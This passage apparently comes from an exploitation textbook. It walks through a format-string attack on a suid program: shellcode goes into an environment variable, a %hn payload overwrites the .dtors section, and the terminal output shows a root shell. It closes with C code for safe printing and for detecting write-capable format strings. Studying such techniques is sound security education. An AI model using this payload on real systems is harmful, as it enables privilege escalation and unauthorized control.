Since the .dtors section is writable, if the address after the 0xffffffff is overwritten with a memory address, the program's execution flow will be directed to that address when the program exits. This will be the address of __DTOR_LIST__ plus four, which is 0x08049694 (which also happens to be the address of __DTOR_END__ in this case).

If the program is suid root, and this address can be overwritten, it will be possible to obtain a root shell.
reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./fmt_vuln
SHELLCODE will be at 0xbffff9ec
reader@hacking:~/booksrc $
Shellcode can be put into an environment variable, and the address can be predicted as usual. Since the program name lengths of the helper program getenvaddr.c and the vulnerable fmt_vuln.c program differ by two bytes, the shellcode will be located at 0xbffff9ec when fmt_vuln.c is executed. This address simply has to be written into the .dtors section at 0x08049694 (shown in bold below) using the format string vulnerability. In the output below the short write method is used.
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xf9ec - 0xbfff
$2 = 14829
(gdb) quit
reader@hacking:~/booksrc $ nm ./fmt_vuln | grep DTOR
08049694 d __DTOR_END__
08049690 d __DTOR_LIST__
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x96\x04\x08\x94\x96\x04\x08")%49143x%4\$hn%14829x%5\$hn
The right way to print user-controlled input:
????%49143x%4$hn%14829x%5$hn
The wrong way to print user-controlled input:
????
b7fe75fc
[*] test_val @ 0x08049794 = -72 0xffffffb8
sh-3.2# whoami
root
sh-3.2#
Even though the .dtors section isn't properly terminated with a NULL address of 0x00000000, the shellcode address is still considered to be a destructor function. When the program exits, the shellcode will be called, spawning a root shell.
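The output above shows the difference between the "right way" (printf("%s", text)) and the "wrong way" (printf(text)) of printing user-controlled input: the second form lets the caller's string act as the format, so conversions like %hn write to memory. The following is an added example, not code from the book or from fmt_vuln.c; it shows the safe form and a small audit function (assumed name audit_format) that a program or a log-inspection tool can use to flag strings that would act as write-capable format strings, including positional forms like %4$hn.

```c
#include <stdio.h>
#include <string.h>

/* Result of scanning a string as if it were a printf format. */
typedef struct {
    int directives;  /* conversion directives other than "%%" */
    int writers;     /* directives that write to memory: %n, %hn, %hhn, %ln ... */
} fmt_audit;

/* Scan s the way printf would interpret it and count conversions.
 * "%%" is a literal percent sign, not a conversion. Positional
 * indexes ("4$"), flags, width, precision and length modifiers are
 * skipped so that "%4$hn" is recognised as an 'n' conversion. */
fmt_audit audit_format(const char *s) {
    fmt_audit a = {0, 0};
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {   /* "%%": literal '%' */
            p++;
            continue;
        }
        p++;
        while (*p && strchr("0123456789$#-+ .'*hlLqjzt", *p))
            p++;             /* skip everything up to the conversion letter */
        if (!*p)
            break;           /* string ended inside a directive */
        a.directives++;
        if (*p == 'n')
            a.writers++;
    }
    return a;
}

/* Returns 1 if passing s directly as a printf format would write memory. */
int would_write_memory(const char *s) {
    return audit_format(s).writers > 0;
}

/* The safe form: user data is an argument, never the format. Any '%'
 * in text is printed verbatim because the format is the literal "%s". */
void print_user_input(const char *text) {
    printf("%s\n", text);
}
```

Run against the string from the session above, the audit reports four directives of which two are memory writers; against a plain message such as "100%% done" it reports none.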